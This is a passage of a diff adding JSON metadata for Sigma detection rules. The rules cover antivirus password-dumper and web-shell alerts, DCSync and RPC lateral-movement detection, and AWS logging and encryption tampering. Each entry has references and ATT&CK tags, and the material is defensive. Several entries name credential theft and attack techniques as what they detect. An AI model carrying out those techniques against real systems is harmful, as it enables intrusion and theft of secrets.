"logsource.product": "No established product", + "refs": [ + "https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/", + "https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619/detection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_password_dumper.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.t1558", + "attack.t1003.001", + "attack.t1003.002" + ] + }, + "uuid": "78cc2dd2-7d20-4d32-93ff-057084c38b93", + "value": "Antivirus Password Dumper Detection" + }, + { + "description": "Detects the suspicious file that is created from PoC code against Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675 .", + "meta": { + "author": "Sittikorn S, Nuttakorn T, Tim Shelton", + "creation_date": "2021/07/01", + "falsepositive": [ + "Unlikely, or pending PSP analysis" + ], + "filename": "av_printernightmare_cve_2021_34527.yml", + "level": "critical", + "logsource.category": "antivirus", + "logsource.product": "No established product", + "refs": [ + "https://twitter.com/mvelazco/status/1410291741241102338", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_printernightmare_cve_2021_34527.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "6fe1719e-ecdf-4caf-bffe-4f501cb0a561", + "value": "Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection" + }, + { + "description": "Detects a highly relevant Antivirus alert that reports ransomware", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/05/12", + "falsepositive": [ + "Unlikely" + ], + "filename": "av_ransomware.yml", + "level": "critical", + "logsource.category": "antivirus", + "logsource.product": "No established product", + "refs": [ + "https://www.nextron-systems.com/?s=antivirus", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_ransomware.yml" + ], + "tags": [ + "attack.t1486" + ] + }, + "uuid": "4c6ca276-d4d0-4a8c-9e4c-d69832f8671f", + "value": "Antivirus Ransomware Detection" + }, + { + "description": "Detects an Antivirus alert in a highly relevant file path or with a relevant file name", + "meta": { + "author": "Florian Roth, Arnim Rupp", + "creation_date": "2018/09/09", + "falsepositive": [ + "Unlikely" + ], + "filename": "av_relevant_files.yml", + "level": "high", + "logsource.category": "antivirus", + "logsource.product": "No established product", + "refs": [ + "https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_relevant_files.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588" + ] + }, + "uuid": "c9a88268-0047-4824-ba6e-4d81ce0b907c", + "value": "Antivirus Relevant File Paths Alerts" + }, + { + "description": "Detects a highly relevant Antivirus alert that reports a web shell. It's highly recommended to tune this rule to the specific strings used by your anti virus solution by downloading a big webshell repo from e.g. github and checking the matches.", + "meta": { + "author": "Florian Roth, Arnim Rupp", + "creation_date": "2018/09/09", + "falsepositive": [ + "Unlikely" + ], + "filename": "av_webshell.yml", + "level": "high", + "logsource.category": "antivirus", + "logsource.product": "No established product", + "refs": [ + "https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/", + "https://github.com/tennc/webshell", + "https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection", + "https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection", + "https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection", + "https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection", + "https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection", + "https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection", + "https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_webshell.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "fdf135a2-9241-4f96-a114-bb404948f736", + "value": "Antivirus Web Shell Detection" + }, + { + "description": "Detects suspicious Django web application framework exceptions that could indicate exploitation attempts", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/08/05", + "falsepositive": [ + "Application bugs" + ], + "filename": "appframework_django_exceptions.yml", + "level": "medium", + "logsource.category": "application", + "logsource.product": "django", + "refs": [ + "https://docs.djangoproject.com/en/1.11/ref/exceptions/", + "https://docs.djangoproject.com/en/1.11/topics/logging/#django-security", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/django/appframework_django_exceptions.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "fd435618-981e-4a7c-81f8-f78ce480d616", + "value": "Django Framework Exceptions" + }, + { + "description": "Generic rule for SQL exceptions in Python according to PEP 249", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/08/12", + "falsepositive": [ + "Application bugs" + ], + "filename": "app_python_sql_exceptions.yml", + "level": "medium", + "logsource.category": "application", + "logsource.product": "python", + "refs": [ + "https://www.python.org/dev/peps/pep-0249/#exceptions", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/python/app_python_sql_exceptions.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "19aefed0-ffd4-47dc-a7fc-f8b1425e84f9", + "value": "Python SQL Exceptions" + }, + { + "description": "Detects remote RPC calls to create or execute a scheduled task via ATSvc", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "rpc_firewall_atsvc_lateral_movement.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/techniques/T1053/", + "https://attack.mitre.org/tactics/TA0008/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1053", + "attack.t1053.002" + ] + }, + "uuid": "0fcd1c79-4eeb-4746-aba9-1b458f7a79cb", + "value": "Remote Schedule Task Lateral Movement via ATSvc" + }, + { + "description": "Detects remote RPC calls to read information about scheduled tasks via AtScv", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "rpc_firewall_atsvc_recon.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/tactics/TA0007/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/zeronetworks/rpcfirewall", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_recon.yml" + ], + "tags": "No established tags" + }, + "uuid": "f177f2bc-5f3e-4453-b599-57eefce9a59c", + "value": "Remote Schedule Task Recon via AtScv" + }, + { + "description": "Detects remote RPC calls to MS-DRSR from non DC hosts, which could indicate DCSync / DCShadow attacks.", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "rpc_firewall_dcsync_attack.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/techniques/T1033/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_dcsync_attack.yml" + ], + "tags": [ + "attack.t1033" + ] + }, + "uuid": "56fda488-113e-4ce9-8076-afc2457922c3", + "value": "Possible DCSync Attack" + }, + { + "description": "Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Legitimate usage of remote file encryption" + ], + "filename": "rpc_firewall_efs_abuse.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/tactics/TA0008/", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-EFSR.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_efs_abuse.yml" + ], + "tags": [ + "attack.lateral_movement" + ] + }, + "uuid": "5f92fff9-82e2-48eb-8fc1-8b133556a551", + "value": "Remote Encrypting File System Abuse" + }, + { + "description": "Detects remote RPC calls to get event log information via EVEN or EVEN6", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Remote administrative tasks on Windows Events" + ], + "filename": "rpc_firewall_eventlog_recon.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/tactics/TA0007/", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_eventlog_recon.yml" + ], + "tags": "No established tags" + }, + "uuid": "2053961f-44c7-4a64-b62d-f6e72800af0d", + "value": "Remote Event Log Recon" + }, + { + "description": "Detects remote RPC calls to create or execute a scheduled task", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "rpc_firewall_itaskschedulerservice_lateral_movement.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/techniques/T1053/", + "https://attack.mitre.org/tactics/TA0008/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1053", + "attack.t1053.002" + ] + }, + "uuid": "ace3ff54-e7fd-46bd-8ea0-74b49a0aca1d", + "value": "Remote Schedule Task Lateral Movement via ITaskSchedulerService" + }, + { + "description": "Detects remote RPC calls to read information about scheduled tasks", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "rpc_firewall_itaskschedulerservice_recon.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/tactics/TA0007/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_recon.yml" + ], + "tags": "No established tags" + }, + "uuid": "7f7c49eb-2977-4ac8-8ab0-ab1bae14730e", + "value": "Remote Schedule Task Recon via ITaskSchedulerService" + }, + { + "description": "Detects remote RPC calls to possibly abuse remote printing service via MS-RPRN / MS-PAR", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Actual printing" + ], + "filename": "rpc_firewall_printing_lateral_movement.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/tactics/TA0008/", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RPRN-PAR.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_printing_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement" + ] + }, + "uuid": "bc3a4b0c-e167-48e1-aa88-b3020950e560", + "value": "Remote Printing Abuse for Lateral Movement" + }, + { + "description": "Detects remote RPC calls that performs remote DCOM operations. These could be abused for lateral movement via DCOM or WMI.", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Some administrative tasks on remote host" + ], + "filename": "rpc_firewall_remote_dcom_or_wmi.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/tactics/TA0008/", + "https://attack.mitre.org/techniques/T1021/003/", + "https://attack.mitre.org/techniques/T1047/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_dcom_or_wmi.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.003", + "attack.t1047" + ] + }, + "uuid": "68050b10-e477-4377-a99b-3721b422d6ef", + "value": "Remote DCOM/WMI Lateral Movement" + }, + { + "description": "Detects remote RPC calls to modify the registry and possible execute code", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Remote administration of registry values" + ], + "filename": "rpc_firewall_remote_registry_lateral_movement.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/techniques/T1112/", + "https://attack.mitre.org/tactics/TA0008/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement" + ] + }, + "uuid": "35c55673-84ca-4e99-8d09-e334f3c29539", + "value": "Remote Registry Lateral Movement" + }, + { + "description": "Detects remote RPC calls to collect information", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Remote administration of registry values" + ], + "filename": "rpc_firewall_remote_registry_recon.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/tactics/TA0007/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_recon.yml" + ], + "tags": "No established tags" + }, + "uuid": "d8ffe17e-04be-4886-beb9-c1dd1944b9a8", + "value": "Remote Registry Recon" + }, + { + "description": "Detects remote RPC calls to possibly abuse remote encryption service via MS-SRVS", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Legitimate remote share creation" + ], + "filename": "rpc_firewall_remote_server_service_abuse.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/tactics/TA0008/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_server_service_abuse.yml" + ], + "tags": [ + "attack.lateral_movement" + ] + }, + "uuid": "b6ea3cc7-542f-43ef-bbe4-980fbed444c7", + "value": "Remote Server Service Abuse" + }, + { + "description": "Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Administrative tasks on remote services" + ], + "filename": "rpc_firewall_remote_service_lateral_movement.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/tactics/TA0008/", + "https://attack.mitre.org/techniques/T1569/002/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SCMR.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_service_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1569.002" + ] + }, + "uuid": "10018e73-06ec-46ec-8107-9172f1e04ff2", + "value": "Remote Server Service Abuse for Lateral Movement" + }, + { + "description": "Detects remote RPC calls to create or execute a scheduled task via SASec", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "rpc_firewall_sasec_lateral_movement.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/techniques/T1053/", + "https://attack.mitre.org/tactics/TA0008/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1053", + "attack.t1053.002" + ] + }, + "uuid": "aff229ab-f8cd-447b-b215-084d11e79eb0", + "value": "Remote Schedule Task Lateral Movement via SASec" + }, + { + "description": "Detects remote RPC calls to read information about scheduled tasks via SASec", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "rpc_firewall_sasec_recon.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/tactics/TA0007/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_recon.yml" + ], + "tags": "No established tags" + }, + "uuid": "0a3ff354-93fc-4273-8a03-1078782de5b7", + "value": "Recon Activity via SASec" + }, + { + "description": "Detects remote RPC calls useb by SharpHound to map remote connections and local group membership.", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "rpc_firewall_sharphound_recon_account.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/techniques/T1087/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-WKST.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_account.yml" + ], + "tags": [ + "attack.t1087" + ] + }, + "uuid": "65f77b1e-8e79-45bf-bb67-5988a8ce45a5", + "value": "SharpHound Recon Account Discovery" + }, + { + "description": "Detects remote RPC calls useb by SharpHound to map remote connections and local group membership.", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "rpc_firewall_sharphound_recon_sessions.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/techniques/T1033/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_sessions.yml" + ], + "tags": [ + "attack.t1033" + ] + }, + "uuid": "6d580420-ff3f-4e0e-b6b0-41b90c787e28", + "value": "SharpHound Recon Sessions" + }, + { + "description": "Detects suspicious Ruby on Rails exceptions that could indicate exploitation attempts", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/08/06", + "falsepositive": [ + "Application bugs" + ], + "filename": "appframework_ruby_on_rails_exceptions.yml", + "level": "medium", + "logsource.category": "application", + "logsource.product": "ruby_on_rails", + "refs": [ + "http://edgeguides.rubyonrails.org/security.html", + "http://guides.rubyonrails.org/action_controller_overview.html", + "https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception", + "https://github.com/rails/rails/blob/cd08e6bcc4cd8948fe01e0be1ea0c7ca60373a25/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/ruby/appframework_ruby_on_rails_exceptions.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "0d2c3d4c-4b48-4ac3-8f23-ea845746bb1a", + "value": "Ruby on Rails Framework Exceptions" + }, + { + "description": "Detects suspicious Spring framework exceptions that could indicate exploitation attempts", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/08/06", + "falsepositive": [ + "Application bugs" + ], + "filename": "appframework_spring_exceptions.yml", + "level": "medium", + "logsource.category": "application", + "logsource.product": "spring", + "refs": [ + "https://docs.spring.io/spring-security/site/docs/current/apidocs/overview-tree.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/spring/appframework_spring_exceptions.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "ae48ab93-45f7-4051-9dfe-5d30a3f78e33", + "value": "Spring Framework Exceptions" + }, + { + "description": "Detects SQL error messages that indicate probing for an injection attack", + "meta": { + "author": "Bjoern Kimminich", + "creation_date": "2017/11/27", + "falsepositive": [ + "Application bugs" + ], + "filename": "app_sqlinjection_errors.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "sql", + "refs": [ + "http://www.sqlinjection.net/errors", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/sql/app_sqlinjection_errors.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "8a670c6d-7189-4b1c-8017-a417ca84a086", + "value": "Suspicious SQL Error Messages" + }, + { + "description": "Detects when an user attached a Lambda layer to an existing function to override a library that is in use by the function, where their malicious code could utilize the function's IAM role for AWS API calls.\nThis would give an adversary access to the privileges associated with the Lambda service role that is attached to that function.\n", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/09/23", + "falsepositive": [ + "Lambda Layer being attached may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Lambda Layer being attached from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "aws_attached_malicious_lambda_layer.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://docs.aws.amazon.com/lambda/latest/dg/API_UpdateFunctionConfiguration.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "97fbabf8-8e1b-47a2-b7d5-a418d2b95e3d", + "value": "AWS Attached Malicious Lambda Layer" + }, + { + "description": "Detects disabling, deleting and updating of a Trail", + "meta": { + "author": "vitaliy0x1", + "creation_date": "2020/01/21", + "falsepositive": [ + "Valid change in a Trail" + ], + "filename": "aws_cloudtrail_disable_logging.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://docs.aws.amazon.com/awscloudtrail/latest/userguide/best-practices-security.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_cloudtrail_disable_logging.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "4db60cc0-36fb-42b7-9b58-a5b53019fb74", + "value": "AWS CloudTrail Important Change" + }, + { + "description": "Detects AWS Config Service disabling", + "meta": { + "author": "vitaliy0x1", + "creation_date": "2020/01/21", + "falsepositive": [ + "Valid change in AWS Config Service" + ], + "filename": "aws_config_disable_recording.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_config_disable_recording.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "07330162-dba1-4746-8121-a9647d49d297", + "value": "AWS Config Disabling Channel/Recorder" + }, + { + "description": "Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region.\nDisabling default encryption does not change the encryption status of your existing volumes.\n", + "meta": { + "author": "Sittikorn S", + "creation_date": "2021/06/29", + "falsepositive": [ + "System Administrator Activities", + "DEV, UAT, SAT environment. You should apply this rule with PROD account only." + ], + "filename": "aws_ec2_disable_encryption.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisableEbsEncryptionByDefault.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ec2_disable_encryption.yml" + ], + "tags": [ + "attack.impact", + "attack.t1486", + "attack.t1565" + ] + }, + "uuid": "16124c2d-e40b-4fcc-8f2c-5ab7870a2223", + "value": "AWS EC2 Disable EBS Encryption" + }, + { + "description": "Detects bulk downloading of User Data associated with AWS 